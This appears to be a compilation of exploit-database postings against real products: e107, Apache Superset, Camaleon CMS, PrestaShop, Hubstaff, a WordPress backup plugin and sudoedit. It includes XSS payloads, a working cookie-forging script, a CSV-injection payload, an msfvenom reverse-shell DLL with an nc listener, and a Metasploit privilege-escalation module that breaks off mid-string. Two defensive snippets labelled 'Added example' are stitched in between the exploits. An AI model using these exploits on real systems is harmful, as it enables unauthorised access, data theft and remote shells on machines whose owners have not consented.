<pre><code>====================================================================================================================================<br />| # Title : 1Two Ecommerce 1.0 Unauthorized administrative access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://www.1two.org/ | <br />| # Dork : Powered by 1Two Ecommerce 1.0 © |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The control panel is not protected by authentication, so it is possible to act and modify anything.<br /><br />[+] Use payload : /admin/<br /><br />[+] http://127.0.0.1/Ventes/admin/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: e107 v2.3.2 - Reflected XSS<br /># Date: 11/05/2022<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://e107.org/<br /># Software Link: https://e107.org/download<br /># Version: 2.3.2<br /># Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br />### XSS Reflected - unauthorized<br /><br />URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php<br />Parameters: content<br /><br /># POC<br />Request:<br />POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 1126<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />Accept: text/html, */*; q=0.01<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://127.0.0.1<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Connection: close<br /><br />content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Thu, 11 May 2023 19:38:45 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29<br />X-Powered-By: PHP/7.4.29<br />Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 1053<br />Connection: close<br />Content-Type: text/html; 
charset=UTF-8<br /><br /><!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb<br /><br />### XSS Reflected - Authorized<br /><br />URL: http://127.0.0.1/e107/e107_admin/image.php<br />Parameters: for<br /><br /># POC 1<br />Request:<br />GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1<br />Host: 127.0.0.1<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Connection: close<br /><br />Response:<br />HTTP/1.1 200 OK<br />Date: Thu, 04 May 2023 03:07:35 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "37f107dbe6a998ecf7b71689627c2a56"<br />Content-Length: 12420<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br /><br /><!doctype html><br /><html lang="en"><br /><head><br /><title>Media Manager - Admin Area :: hacked">bbbbb</title><br /><meta charset='utf-8' /><br /><meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" /><br /><!-- *CSS* --><br />[...]<br /><div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path="><br /> <p>No HTML5 support.</p><br /> </div><br />[...]<br /><br /># POC 2<br /><br />URL: http://127.0.0.1/e107/e107_admin/newspost.php<br />Parameters: Payload in URL<br /><br />Request:<br />GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1<br />Host: 127.0.0.1<br />Cache-Control: max-age=0<br 
/>sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8<br />Connection: close<br /><br />Response:<br /><br /><br /><br /><br />HTTP/1.1 200 OK<br />Date: Fri, 05 May 2023 06:21:53 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29<br />X-Powered-By: e107<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />ETag: "d127dd6a44a22e093fed60b83bf36af2"<br />Content-Length: 72914<br />Vary: Accept-Encoding<br />X-Frame-Options: SAMEORIGIN<br />Connection: close<br />Content-Type: text/html; charset=utf-8<br /><br /><!doctype html><br /><html lang="en"><br /><head><br /><title>News - List - Admin Area :: hacked">bbbbb</title><br /><meta charset='utf-8' /><br /><meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" /><br /><!-- *CSS* --><br />[...]<br /><a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h"><br /><script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a><br />[...]<br /><br /></code></pre>
<pre><code># Exploit Title: Apache Superset 2.0.0 - Authentication Bypass<br /># Date: 10 May 2023<br /># Exploit Author: MaanVader<br /># Vendor Homepage: https://superset.apache.org/<br /># Version: Apache Superset<= 2.0.1<br /># Tested on: 2.0.0<br /># CVE: CVE-2023-27524<br /><br />from flask_unsign import session<br />import requests<br />import urllib3<br />import argparse<br />import re<br />from time import sleep<br />from selenium import webdriver<br />from urllib.parse import urlparse<br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br /><br />SECRET_KEYS = [<br />    b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',  # version < 1.4.1<br />    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',  # version >= 1.4.1<br />    b'thisISaSECRET_1234',  # deployment template<br />    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',  # documentation<br />    b'TEST_NON_DEV_SECRET'  # docker compose<br />]<br /><br />def main():<br /><br />    parser = argparse.ArgumentParser()<br />    parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)<br />    parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')<br />    args = parser.parse_args()<br /><br />    try:<br />        u = args.url.rstrip('/') + '/login/'<br /><br />        headers = {<br />            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'<br />        }<br /><br />        resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)<br />        if resp.status_code != 200:<br />            print(f'Error retrieving login page at {u}, status code: {resp.status_code}')<br />            return<br /><br />        session_cookie = None<br />        for c in resp.cookies:<br />            if c.name == 'session':<br />                session_cookie = c.value<br />                break<br /><br />        if not session_cookie:<br />            print('Error: No session cookie found')<br />            return<br /><br />        print(f'Got session cookie: {session_cookie}')<br /><br />        try:<br />            decoded = session.decode(session_cookie)<br />            print(f'Decoded session cookie: {decoded}')<br />        except:<br />            print('Error: Not a Flask session cookie')<br />            return<br /><br />        match = re.search(r'"version_string": "(.*?)&#34', resp.text)<br />        if match:<br />            version = match.group(1)<br />        else:<br />            version = 'Unknown'<br /><br />        print(f'Superset Version: {version}')<br /><br />        for i, k in enumerate(SECRET_KEYS):<br />            cracked = session.verify(session_cookie, k)<br />            if cracked:<br />                break<br /><br />        if not cracked:<br />            print('Failed to crack session cookie')<br />            return<br /><br />        print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')<br /><br />        try:<br />            user_id = int(args.id)<br />        except:<br />            user_id = args.id<br /><br />        forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)<br />        print(f'Forged session cookie for user {user_id}: {forged_cookie}')<br />        u1 = args.url.rstrip('/') + '/superset/welcome'<br /><br />        print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")<br /><br />    except Exception as e:<br />        print(f'Unexpected error: {e}')<br /><br /><br />if __name__ == '__main__':<br />    main()<br /></code></pre>
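Defender-side check for the default-key weakness the script above exploits, as an added example that is neither the advisory's nor Apache Superset's code: it audits a configured SECRET_KEY against the advisory's list of known defaults plus length and entropy thresholds (the thresholds are assumptions) and mints a replacement value.

```python
# Added example (not part of the advisory or of Apache Superset): audit a Flask
# SECRET_KEY for the default-value weakness behind CVE-2023-27524.
import math
import secrets
from collections import Counter

# The defaults the advisory enumerates; any of these makes session cookies forgeable.
KNOWN_DEFAULT_KEYS = {
    b"\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h",  # version < 1.4.1
    b"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",         # version >= 1.4.1
    b"thisISaSECRET_1234",                           # deployment template
    b"YOUR_OWN_RANDOM_GENERATED_SECRET_KEY",         # documentation
    b"TEST_NON_DEV_SECRET",                          # docker compose
}
MIN_KEY_BYTES = 32        # assumption: at least 256 bits of key material
MIN_BITS_PER_BYTE = 3.0   # assumption: below this the value looks hand-typed
PLACEHOLDER_WORDS = (b"secret", b"change", b"test", b"password")


def shannon_bits_per_byte(data: bytes) -> float:
    """Empirical Shannon entropy of the byte string, in bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def audit_secret_key(key) -> list:
    """Return a list of findings; an empty list means the key passed every check."""
    if isinstance(key, str):
        key = key.encode()
    findings = []
    if key in KNOWN_DEFAULT_KEYS:
        findings.append("known default SECRET_KEY (CVE-2023-27524): session cookies are forgeable")
    if len(key) < MIN_KEY_BYTES:
        findings.append(f"key is {len(key)} bytes, shorter than {MIN_KEY_BYTES}")
    if shannon_bits_per_byte(key) < MIN_BITS_PER_BYTE:
        findings.append("low entropy: looks like a human-chosen or placeholder value")
    if any(w in key.lower() for w in PLACEHOLDER_WORDS):
        findings.append("contains a placeholder-style word")
    return findings


def generate_secret_key(n_bytes: int = MIN_KEY_BYTES) -> str:
    """Replacement for SECRET_KEY in superset_config.py; rotating it logs every session out."""
    return secrets.token_urlsafe(n_bytes)


if __name__ == "__main__":
    for k in sorted(KNOWN_DEFAULT_KEYS):
        print(k, "->", audit_secret_key(k))
    fresh = generate_secret_key()
    print("generated:", fresh, "->", audit_secret_key(fresh))
```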
<pre><code># Exploit Title: Authenticated Persistent XSS in Camaleon CMS 2.7.4<br /># Google Dork: intext:"Camaleon CMS is a free and open-source tool and<br />a flexible content management system (CMS) based on Ruby on Rails"<br /># Date: 2023-10-05<br /># Exploit Author: Yasin Gergin<br /># Vendor Homepage: http://camaleon.tuzitio.com<br /># Software Link: https://github.com/owen2345/camaleon-cms<br /># Version: 2.7.4<br /># Tested on: Linux kali 6.1.0-kali7-amd64<br /># CVE : -<br /><br />--- Description ---<br /><br />http://127.0.0.1:3000/admin/login - Log in as an Admin<br /><br />Under the Post tab click on "Create New"<br /><br />While creating the post, set the Title to "><svg/onmouseover=alert(document.cookie)><br /><br />http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent<br />to this URL<br /><br />-- POST DATA --<br /><br />POST /admin/post_type/2/posts HTTP/1.1<br /><br />Host: 127.0.0.1:3000<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 666<br />Origin: http://127.0.0.1:3000<br />Connection: keep-alive<br />Cookie:<br />_my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D;<br />auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1;<br 
/>phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br /><br />authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=<br /><br />-- POST DATA --<br /><br />Then view the post you've created by clicking on "View Page" and move your<br />mouse cursor onto the post title. The XSS will pop up.<br /><br /><br /></code></pre>
<pre><code>Exploit Title: Prestashop 8.0.4 - CSV injection<br />Application: prestashop<br />Version: 8.0.4<br />Bugs: CSV Injection<br />Technology: PHP<br />Vendor URL: https://prestashop.com/<br />Software Link: https://prestashop.com/prestashop-edition-basic/<br />Date found: 14.05.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Windows<br /><br /><br />2. Technical Details & POC<br />========================================<br />Step 1. Log in as a user.<br />Step 2. Go to My Account, then Information ( http://localhost/index.php?controller=identity ).<br />Step 3. Set the Email to =calc|a!z|@test.com<br />Step 4. If the admin exports customers as a CSV file, the CSV injection fires on the admin's computer and opens the calculator (http://localhost/admin07637b2omxxdbmhikgb/index.php/sell/customers/?_token=mtc1BTvq-Oab2lBdfCaxpOorYraGGVMiTFluJzOpkWI)<br /><br />payload: =calc|a!z|@test.com<br /><br /><br /></code></pre>
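The mitigation for the export step described above, as an added example that is not PrestaShop's code: a CSV writer that neutralises formula-leading cells (=, +, -, @, tab, CR) by prefixing an apostrophe, shown on constructed customer rows that include the advisory's payload.

```python
# Added example (not PrestaShop code): neutralise spreadsheet formula injection
# when exporting user-supplied fields such as customer e-mail addresses to CSV.
import csv
import io

# A cell starting with any of these is evaluated as a formula by Excel/LibreOffice.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value) -> str:
    """Prefix formula-looking cells with an apostrophe so they are read as text.

    Only leading spaces are stripped before the check, so a cell that starts
    with a tab or carriage return is still caught.
    """
    if value is None:
        return ""
    text = str(value)
    if text.lstrip(" ").startswith(FORMULA_PREFIXES):
        return "'" + text
    return text


def export_customers_csv(rows) -> str:
    """Render customer dicts to CSV text with every cell neutralised and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["id", "email", "name"])
    for row in rows:
        writer.writerow([neutralize_cell(row.get(k)) for k in ("id", "email", "name")])
    return buf.getvalue()


# Constructed rows; the second one carries the advisory's payload as its e-mail.
SAMPLE_CUSTOMERS = [
    {"id": 1, "email": "alice@example.com", "name": "Alice"},
    {"id": 2, "email": "=calc|a!z|@test.com", "name": "Mallory"},
    {"id": 3, "email": "bob@example.com", "name": "  +Bob"},
]

if __name__ == "__main__":
    print(export_customers_csv(SAMPLE_CUSTOMERS), end="")
```

Neutralising at export time is the layer the exporter controls; stricter validation of the e-mail field on the identity form is the complementary input-side fix.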
<pre><code>*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking<br />*#Date:* 14/05/2023<br />*#Exploit Author:* Ahsan Azad<br />*#Vendor Homepage:* https://hubstaff.com/<br />*#Software Link:* https://app.hubstaff.com/download<br />*#Version:* 1.6.13, 1.6.14<br />*#Tested On:* 64-bit operating system, x64-based processor<br /><br />*Description*<br />Hubstaff is an employee work tracker with screenshots, timesheets, billing,<br />in-depth reports, and more.<br /><br />During testing, it was found that the system32 subdirectory was missing a<br />DLL library with the name *wow64log.dll* that is required by the<br />Hubstaff setup file during installation. Hence, by using Metasploit's<br />msfvenom to create a new wow64log.dll file, the tester was able to get a<br />reverse shell locally.<br /><br /><br />*Exploit*<br />1- Generate a DLL file with the name wow64log.dll using the command:<br /><br />*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll<br />-o wow64log.dll*<br /><br />2- Place the newly generated DLL in the *system32* directory.<br />3- Start a listener on the attacker's console using:<br /><br />*nc -lnvp <port_used_while_generating_DLL>*<br /><br />4- Launch the exe.<br /><br />The reverse shell will be received as:<br /><br /><br />*C:\Windows>*<br /><br /><br /><br />*Attachments (For the understanding of the verification team)*<br />1.png - Showing that wow64log.dll was not found by the exe. [image: 1.png]<br /><br />2.png - Showing how the tester was able to generate a new DLL using msfvenom on<br />port 1337.<br />[image: 2.png]<br /><br />3.png - Showing a reverse connection received on the attacker's console<br />at C:\Windows> by launching the exe. [image: 3.png]<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup<br /># Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")<br /># Date: 2023-05-10<br /># Exploit Author: Wadeek<br /># Vendor Homepage: https://backupbliss.com/<br /># Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip<br /># Version: 1.2.8<br /># Tested on: WordPress 6.2<br /><br />1) Get the version of the plugin.<br /><br />=> GET /wp-content/plugins/backup-backup/readme.txt<br />--------------------------------------------------------------------------<br />Stable tag: 1.2.8<br />--------------------------------------------------------------------------<br /><br />2) Get the name of the backup directory.<br /><br />=> GET /wp-content/backup-migration/config.json<br />--------------------------------------------------------------------------<br />{<br />[...],<br />"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",<br />[...],<br />"OTHER:EMAIL":"admin@email.com"<br />}<br />--------------------------------------------------------------------------<br /><br />3) Get the name of the archive containing the backups.<br /><br />=> GET /wp-content/backup-migration/complete_logs.log<br />--------------------------------------------------------------------------<br />BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip<br />--------------------------------------------------------------------------<br /><br />4) Build the path for the download.<br /><br />=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::Linux::System<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Sudoedit Extra Arguments Priv Esc',<br /> 'Description' => %q{<br /> This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package.<br /> The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided<br /> environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to<br /> append arbitrary entries to the list of files to process. This can lead to privilege escalation<br /> by appending extra entries to /etc/sudoers, allowing for execution of an arbitrary payload with root<br /> privileges.<br /><br /> Affected versions are 1.8.0 through 1.9.12.p1. 
However THIS module only works against Ubuntu<br /> 22.04 and 22.10.<br /><br /> This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04, and<br /> 1.9.11p3-1ubuntu1 on Ubuntu 22.10.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Matthieu Barjole', # original PoC, analysis<br /> 'Victor Cutillas' # original PoC, analysis<br /> ],<br /> 'Platform' => [ 'linux' ],<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'EDB', '51217' ],<br /> [ 'URL', 'https://github.com/M4fiaB0y/CVE-2023-22809/blob/main/exploit.sh' ],<br /> [ 'URL', 'https://raw.githubusercontent.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc/main/exploit.sh' ],<br /> [ 'URL', 'https://www.vicarius.io/vsociety/blog/cve-2023-22809-sudoedit-bypass-analysis' ],<br /> [ 'URL', 'https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466' ],<br /> [ 'URL', 'https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf' ],<br /> [ 'URL', 'https://www.sudo.ws/security/advisories/sudoedit_any/'],<br /> [ 'CVE', '2023-22809' ]<br /> ],<br /> 'DisclosureDate' => '2023-01-18',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]<br /> }<br /> )<br /> )<br /> register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),<br /> OptString.new('EDITABLEFILE', [ false, 'A file which can be edited with sudo -e or sudoedit' ]),<br /> OptString.new('SHELL', [ true, 'A shell we can launch our payload from. 
Bash or SH should be safe', '/bin/sh' ]),<br /> OptInt.new('TIMEOUT', [true, 'The timeout waiting for sudo commands to respond', 10]),<br /> ]<br /> end<br /><br /> def timeout<br /> datastore['TIMEOUT']<br /> end<br /><br /> # Simplify pulling the writable directory variable<br /> def base_dir<br /> datastore['WritableDir'].to_s<br /> end<br /><br /> def get_editable_file<br /> if datastore['EDITABLEFILE'].present?<br /> fail_with(Failure::BadConfig, 'EDITABLEFILE must be a file.') unless file?(datastore['EDITABLEFILE'])<br /><br /> vprint_status("Using user defined EDITABLEFILE: #{datastore['EDITABLEFILE']}")<br /> return datastore['EDITABLEFILE']<br /> end<br /><br /> # we do a rev here to reverse the order since we only want the last entry (the file name), take item 1, then rev it back so its normal. this seemed to<br /> # be the easiest way to do a cut -f -1 (negative one). https://stackoverflow.com/questions/22727107/how-to-find-the-last-field-using-cut<br /> editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E \'\\(root\\)|\\(ALL\\)|\\(ALL : ALL\\)\' | rev | cut -d " " -f 1 | rev')<br /> editable_file = editable_file.strip<br /> if editable_file.nil? || editable_file.empty? 
|| editable_file.include?('a terminal is required to read the password') || editable_file.include?('password for')<br /> return nil<br /> end<br /><br /> return nil unless file?(editable_file)<br /><br /> editable_file<br /> end<br /><br /> def get_sudo_version_from_sudo<br /> package = cmd_exec('sudo --version')<br /> package = package.split(' ')[2] # Sudo version XXX<br /> begin<br /> Rex::Version.new(package)<br /> rescue ArgumentError<br /> # this happens on systems like debian 8.7.1 which doesn't have sudo<br /> Rex::Version.new(0)<br /> end<br /> end<br /><br /> def check<br /> sys_info = get_sysinfo<br /><br /> # Check the app is installed and the version<br /> if sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian'<br /> package = cmd_exec('dpkg -l sudo | grep \'^ii\'')<br /> package = package.split(' ')[2] # ii, package name, version, arch<br /> begin<br /> ver_no = Rex::Version.new(package)<br /> rescue ArgumentError<br /> ver_no = get_sudo_version_from_sudo<br /> end<br /> else<br /> ver_no = get_sudo_version_from_sudo<br /> end<br /><br /> # according to CVE listing, but so much backporting...<br /> minimal_version = '1.8.0'<br /> maximum_version = '1.9.12p1'<br /> exploitable = false<br /><br /> # backporting... so annoying.<br /> # https://ubuntu.com/security/CVE-2023-22809<br /> if sys_info[:distro] == 'ubuntu'<br /> if sys_info[:version].include? '22.10' # kinetic<br /> exploitable = true<br /> maximum_version = '1.9.11p3-1ubuntu1.1'<br /> elsif sys_info[:version].include? '22.04' # jammy<br /> exploitable = true<br /> maximum_version = '1.9.9-1ubuntu2.2'<br /> elsif sys_info[:version].include? '20.04' # focal<br /> maximum_version = '1.8.31-1ubuntu1.4'<br /> elsif sys_info[:version].include? '18.04' # bionic<br /> maximum_version = '1.8.21p2-3ubuntu1.5'<br /> elsif sys_info[:version].include? '16.04' # xenial<br /> maximum_version = '1.8.16-0ubuntu1.10+esm1'<br /> elsif sys_info[:version].include? 
'14.04' # trusty<br /> maximum_version = '1.8.9p5-1ubuntu1.5+esm7'<br /> end<br /> end<br /><br /> if ver_no == Rex::Version.new(0)<br /> return Exploit::CheckCode::Unknown('Unable to detect sudo version')<br /> end<br /><br /> if ver_no < Rex::Version.new(maximum_version) && ver_no >= Rex::Version.new(minimal_version)<br /> vprint_good("sudo version #{ver_no} is vulnerable")<br /> # check if theres an entry in /etc/sudoers that allows us to edit a file<br /> editable_file = get_editable_file<br /> if editable_file.nil?<br /> if exploitable<br /> return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. Please set EDITABLEFILE option manually")<br /> else<br /> return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module")<br /> end<br /> elsif exploitable<br /> return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}")<br /> else<br /> return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}. OS can NOT be exploited by this module")<br /> end<br /> end<br /><br /> CheckCode::Safe("sudo version #{ver_no} may NOT be vulnerable")<br /> end<br /><br /> def exploit<br /> # Check if we're already root<br /> if !datastore['ForceExploit'] && is_root?<br /> fail_with Failure::None, 'Session already has root privileges. 
